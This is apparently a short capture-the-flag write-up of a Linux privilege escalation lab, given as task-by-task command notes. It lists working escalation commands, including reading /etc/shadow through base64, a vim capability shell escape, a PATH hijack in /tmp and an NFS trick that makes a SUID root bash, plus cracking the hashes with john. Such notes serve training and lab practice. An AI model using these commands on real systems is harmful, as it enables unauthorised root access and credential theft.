Linux Privilege Escalation

January 08, 2024

Task 1

Task 2

Task 3

Task 4

Task 5

Task 6

sudo -l 

sudo nmap --interactive

Task 7

base64 /etc/shadow | base 64 --decode

base64 "/home/ubuntu/flag3.txt" | base64 --decode

Task 8

Just use this command to see the capabilities that can be use to suid

getcap -r / 2>/dev/null

./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

Task 9 - Crontab

Change the content on the file that runs on crontab

Get the password hash from the /etc/shadow

Task 10

Find writable folders with this command

find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u

Display the PATH to see the folder that has executable files

echo $PATH

Make a executable file that has /bin/bash in it

cd /tmp
echo "/bin/bash" > thm
chmod 777 thm
export PATH=/tmp:$PATH

There is a executable ./test file that will run the ./thm command from the /tmp/thm that has /bin/bash

This test file is suid file

Task 11

cat /etc/exports

From the attacker machine use this command

showmount -e 10.10.173.235

mkdir /tmp/attacker
sudo mount -o rw 10.10.166.100:/tmp /tmp/attacker

After you mount the /tmp to the attacker machine we will now copy the /bin/bash to the /tmp from the victim machine

cd /tmp
cp /bin/bash bash

then use these commands to change the owner of that file and make it suid and executable

sudo chown root:root bash
sudo chmod +sx bash

then just run the command

./bash -p

Task 12

First ssh to leonard user then find the suid, after that use base64

find / -perm -u=s -type f 2>/dev/null

base64 /etc/shadow | base64 -d

Get the password hash then use john

Then ssh to view the flag1

After that use sudo -l to view the sudo commands that the user can use

We now own the box

Last updated 1 year ago